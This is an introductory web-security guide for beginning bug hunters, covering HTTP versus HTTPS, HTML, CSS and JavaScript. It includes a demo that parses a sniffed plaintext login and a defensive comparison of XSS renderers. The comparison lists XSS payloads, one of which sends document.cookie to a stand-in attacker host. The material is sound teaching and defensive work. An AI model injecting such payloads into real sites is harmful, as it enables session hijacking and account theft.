We will be taking you through some of the more common technologies in use these days, but know that these are not the only things out there and that this is also not the only path to success. I've crafted this guide to go from easiest to hardest, bearing in mind whether a technology is front- or back-end.
This is the protocol that describes how web pages are transferred over the internet; other examples of protocols are SSH and FTP. One big flaw in plain HTTP is that it is not encrypted. If an attacker can pull off a man-in-the-middle attack, placing themselves between the victim and the internet, they can read (and modify) the traffic without any trouble: the request line, every header including the Cookie header, and bodies such as submitted login forms all travel as clear text. To prevent this, HTTPS was introduced. It wraps HTTP in TLS (the successor of SSL), and the server proves its identity with a certificate issued by a certificate authority (CA).
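To make the man-in-the-middle point concrete, here is an added example that is not part of the original guide: a small parser for the HTTP/1.1 wire format, run over a constructed login request and the server's response. The host name, cookie values and credentials are made up for the example, and the function names are my own. Every field the parser pulls out is exactly what a passive observer on the network reads when the connection is not protected by TLS.

```javascript
// Added example, not from the original guide: a minimal HTTP/1.1 message parser
// run over a constructed request/response pair. Host, cookies and credentials
// below are invented for the demo.

// Constructed sample exchange. Note the Cookie header and the form body: on plain
// HTTP both are readable by anyone between the browser and the server.
const RAW_REQUEST =
  "POST /login HTTP/1.1\r\n" +
  "Host: shop.example\r\n" +
  "Content-Type: application/x-www-form-urlencoded\r\n" +
  "Cookie: session=3f2a9c1b\r\n" +
  "Content-Length: 27\r\n" +
  "\r\n" +
  "user=alice&pass=hunter2wins";

const RAW_RESPONSE =
  "HTTP/1.1 302 Found\r\n" +
  "Location: /account\r\n" +
  "Set-Cookie: session=9d7e4b22; Path=/; HttpOnly\r\n" +
  "Content-Length: 0\r\n" +
  "\r\n";

// Split a raw HTTP message into start line, headers and body.
// Header names are case-insensitive, so they are lower-cased for lookup.
function parseHttpMessage(raw) {
  const sep = raw.indexOf("\r\n\r\n");
  if (sep === -1) throw new Error("incomplete message: no blank line after headers");
  const head = raw.slice(0, sep).split("\r\n");
  const rest = raw.slice(sep + 4);
  const headers = {};
  for (const line of head.slice(1)) {
    const colon = line.indexOf(":");
    if (colon === -1) throw new Error("malformed header line: " + line);
    const name = line.slice(0, colon).trim().toLowerCase();
    const value = line.slice(colon + 1).trim();
    // Repeated headers (several Set-Cookie lines, for instance) are kept as a list.
    (headers[name] = headers[name] || []).push(value);
  }
  // Honour Content-Length so bytes belonging to a following message are not swallowed.
  const declared = headers["content-length"]
    ? parseInt(headers["content-length"][0], 10)
    : rest.length;
  return { startLine: head[0], headers, body: rest.slice(0, declared) };
}

// Request line: "METHOD TARGET VERSION".
function parseRequest(raw) {
  const msg = parseHttpMessage(raw);
  const [method, target, version] = msg.startLine.split(" ");
  return { method, target, version, headers: msg.headers, body: msg.body };
}

// Status line: "VERSION STATUS REASON".
function parseResponse(raw) {
  const msg = parseHttpMessage(raw);
  const m = /^(HTTP\/\d\.\d) (\d{3}) ?(.*)$/.exec(msg.startLine);
  if (!m) throw new Error("bad status line: " + msg.startLine);
  return { version: m[1], status: parseInt(m[2], 10), reason: m[3], headers: msg.headers, body: msg.body };
}

// What one unencrypted round trip hands to a passive on-path attacker:
// the session cookie the client sent, the credentials in the form body,
// and the fresh session cookie the server set.
function sniff(rawReq, rawRes) {
  const req = parseRequest(rawReq);
  const res = parseResponse(rawRes);
  const form = Object.fromEntries(new URLSearchParams(req.body));
  return {
    sentCookie: (req.headers["cookie"] || [])[0] || null,
    credentials: form,
    newCookies: (res.headers["set-cookie"] || []).map((c) => c.split(";")[0]),
  };
}

console.log(sniff(RAW_REQUEST, RAW_RESPONSE));
```

Run it with node and compare the printed object with the raw strings above: nothing had to be decrypted, the parser only had to find the line breaks. With HTTPS the observer sees TLS records instead, and the Host name (via SNI) is about the only thing left in the clear.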
Modern web applications no longer consist of the static pages we found at the beginning of the internet. They are often complex projects that rely on dynamic data. Static web pages mostly consist of HTML, JavaScript, and CSS, and we will refer to these as client-side from here on. When we drag other technologies such as ASPX, PHP, or Node.js into the mix, these back-end or server-side technologies breathe life into the application.
HTML, or HyperText Markup Language, is one of the "markup" languages, as the name implies; XML, for example, falls under the same category. A markup language is a system for annotating a document in a way that is visually distinguishable from the content. That definition is not what matters here. What matters is that these structured documents are things we as attackers might be able to manipulate, so it is important to learn at least the very basics of HTML.
Every HTML document has the same basic skeleton:
<!DOCTYPE html>
<html>
<head></head>
<body></body>
</html>
"But uncle rat...", I hear you say, "I can make a document called "test.html" and simply put in a random string 'asdasd' and it will open and display the text just fine and you would be correct. HTML is very fault-tolerant and your browser will try to automatically correct any errors you made. This means that if the above structure is missing, your browser will put the text in between the structure for you. The fact this is supposed to happen and how it happens is all described in the HTML RFC documentation but we will get to that later. What you need to know for now is that this kind of auto-complete is one possible avenue for XSS attacks for example.
HTML pages on their own are perfectly functional, but at some point you might want to dress up your newly made website a little. You quickly run into problems, however: most of what you can do with HTML is limited to describing the document itself, and when it comes to styling those components we need to look at CSS. CSS in itself is still relatively harmless and only serves to describe the visual style of a document. It becomes dangerous when inline CSS is used and user-controlled data is inserted into it (a closing style tag in that data lets an attacker end the stylesheet and start writing HTML, and even plain CSS selectors can be abused to leak attribute values), but we will come back to that later. Inline CSS simply means that the CSS is declared within the HTML document, in a style element or a style attribute, instead of in a separate file.
body {
font-size: 10pt;
font-family: Verdana, Geneva, Arial, Helvetica, sans-serif;
color: black;
line-height: 14pt;
padding-left: 5pt;
padding-right: 5pt;
padding-top: 5pt;
}
Now that we have a pretty, static HTML page, we might want to add some interactive elements such as an image carousel or a distance calculator. This is where HTML and CSS fall short and where JS comes in. This powerful scripting language looks nothing like its namesake Java: where Java needs its own virtual machine installed, JavaScript runs right inside your browser, and there are even several libraries for game development. Incidentally, I think the best way to learn something is to create things you enjoy, and since I love gaming, this is how I learned to program as well.
(https://blog.bitsrc.io/9-top-js-gaming-engines-and-libraries-for-2020-81707d9f095)
Because JavaScript is so powerful, attackers will often try to leverage it to do things like steal session cookies or CSRF tokens. Anyone who wants to get serious about XSS should have at least a surface-level understanding of JavaScript and be very willing to keep learning while hacking. Most JavaScript concepts can be taught fairly easily, but intuitively debugging why a payload that should fire does not is a different story. The simplest proof-of-concept payload, which pops a dialog as soon as the injected script runs, is:
<script>alert()</script>
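To tie the fault-tolerance point from the HTML section together with the alert() payload above, here is an added example that is not part of the original guide. It renders the same user comment three ways (untouched, through a naive blocklist that strips script tags, and through proper HTML output encoding) and then checks which payloads still end up as a real tag. The comment template, the payloads, the attacker host name and the helper names are constructed for this example.

```javascript
// Added example, not from the original guide. Template, payloads and helpers are
// constructed to show why the browser's forgiving parser defeats blocklists and
// why output encoding is the actual fix.

// Constructed attacker inputs. Each leans on parser tolerance described in the
// guide: tag names matched case-insensitively, "/" accepted where whitespace is
// expected, unquoted attribute values, and a stray quote closing an attribute.
const PAYLOADS = {
  classic: "<script>alert()</script>",
  cookieTheft: '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>',
  mixedCase: "<ScRiPt>alert()</ScRiPt>",
  noScriptTag: "<svg/onload=alert()>",
  attrBreakout: '"><img src=x onerror=alert()>',
};

// Vulnerable #1: the comment is placed in an attribute and in the body as-is.
function renderCommentRaw(text) {
  return '<div class="comment" data-author="' + text + '">' + text + "</div>";
}

// Vulnerable #2: a blocklist that removes the one spelling of one tag it knows
// about. The browser accepts many others (and other tags with event handlers).
function renderCommentBlocklist(text) {
  const stripped = text.replace(/<\/?script>/g, "");
  return '<div class="comment" data-author="' + stripped + '">' + stripped + "</div>";
}

// Hardened: encode the five characters that can change meaning in HTML text and
// inside double- or single-quoted attribute values. After this the parser never
// sees a tag or attribute boundary in user data; it is all shown as text.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

function renderCommentSafe(text) {
  const safe = escapeHtml(text);
  return '<div class="comment" data-author="' + safe + '">' + safe + "</div>";
}

// Demo check: the only legitimate tag start in the output is the wrapping <div>,
// so any additional "<" followed by a letter is something the browser will turn
// into an element (including "<svg/", which the parser accepts without a space).
function looksInjected(html) {
  return (html.match(/<[a-z]/gi) || []).length > 1;
}

// Run every payload through every renderer and report which ones still inject.
function evaluatePayloads() {
  const report = {};
  for (const [name, payload] of Object.entries(PAYLOADS)) {
    report[name] = {
      raw: looksInjected(renderCommentRaw(payload)),
      blocklist: looksInjected(renderCommentBlocklist(payload)),
      safe: looksInjected(renderCommentSafe(payload)),
    };
  }
  return report;
}

console.table(evaluatePayloads());
```

The printed table is the point: the blocklist catches exactly the two payloads that spell out a lowercase script tag and nothing else, while encoding neutralises all five without needing to know what any of them looks like. That is also why debugging a payload that "should" fire means reading how the application encodes or strips your input, not just trying more spellings of alert().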